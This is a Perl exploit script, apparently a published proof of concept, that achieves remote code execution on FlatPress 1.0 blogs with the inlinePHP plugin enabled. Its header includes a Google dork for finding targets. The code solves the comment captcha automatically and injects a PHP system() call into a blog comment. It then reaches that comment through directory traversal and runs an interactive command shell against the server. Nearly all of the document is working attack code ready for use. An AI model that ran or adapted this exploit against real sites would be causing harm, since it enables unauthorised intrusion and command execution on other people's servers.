#!/usr/bin/perl# Exploit Title: Flatpress remore code execution PoC NULLday# Google Dork: This site is powered by FlatPress.# Date: 17/10/2013# Exploit Author: Wireghoul# Vendor Homepage: http://flatpress.org/home/# Software Link:
http://downloads.sourceforge.net/project/flatpress/flatpress/FlatPress%201.0%20Solenne/flatpress-1.0-solenne.tar.bz2
# Version: v1.0## Blended threat, executes code injected into comment# by loading comment as a page through directory traversal# Requires the inlinePHP plugin to be enabled.# Written by @Wireghoul - justanotherhacker.com## This is for my peeps and the freaks in the front row -- Hilltop Hoods:
Nosebleed section
use strict;
use warnings;
use LWP::UserAgent;&banner;&usage if(!$ARGV[0]);
my $injid ='Spl0ited'.int(rand(9999));
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->cookie_jar({file=>"tmp/flatpress-rce.txt"});
sub banner {print"\nFlatpress remote code execution PoC by \@Wireghoul\n";print"=======================[ justanotherhacker.com]==\n";}
sub usage {print"Usage: $0 <url>\n";
exit;}
my $response =
$ua->get("$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php");if(!$response->is_success){print "[-] Inline PHP plugin not found at
$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php\n";}else{print"[+] Inline PHP plugin found, hopefully it is enabled!\n";}# Prepare for exploitation, find entry + comment location
$response = $ua->get($ARGV[0]);if($response->is_success){if($response->decoded_content =~/(http.*?x=entry:entry.*?;comments:1#comments)/) {
my $cmntlink = $1;print"[+] Found comment link: $cmntlink\n";
my $aaspam =0;# Can't be bothered solving easy captchas, justreload page until we get one we like
while($aaspam ==0){
$response = $ua->get($cmntlink);if($response->decoded_content =~/<strong>(\d+) plus (\d+) \?
\(\*\)/){
$aaspam = $1+$2;print"[+] Defeated antispam $1 + $2 = $aaspam\n";}else{
$response->decoded_content =~ m/<strong>(.*) \? \(\*\)/;print"[*] Unknown antispam: $1 ... retrying\n";}}# Post a comment
$response = $ua->post(
$cmntlink."form",
Content =>{'name'=> $injid,'email'=>'','url'=>'','aaspam'=> $aaspam,'content'=>"SHELL[exec]system(\$_GET['cmd']);[/exec]LLEHS",'submit'=>'Add',});
$response = $ua->get($cmntlink);# Find link to injected content, then execute psuedo shell in loop
my @cmnts = split (/<li id="comment/, $response->decoded_content);
my @injected = grep /$injid/, @cmnts;if($injected[0]=~/$injid/){print"[+] Injection ($injid) successful\n";
$injected[0]=~
m/(http.*?)x=entry:entry(\d\d)(\d\d)(\d\d-\d+);comments:1#comment(\d+-\d+)/;
my
$shell="$1page=../../content/$2/$3/entry$2$3$4/comments/comment$5";print"[*] Dropping into shell, type exit to exit\n";
my $line='';while(1){print'$';
$line=<STDIN>;if($line =~/^exit$/){ exit;};
my $output=$ua->get("$shell&cmd=$line");
$output->decoded_content =~/SHELL(.*)LLEHS/ms;
my $clean = $1; $clean =~ s/<br \/>//g;print"$clean\n";}}else{print'[-] Unable to identify the injection point';}}else{print"[-] Comment link not found\n";}}else{
die $response->status_line;}
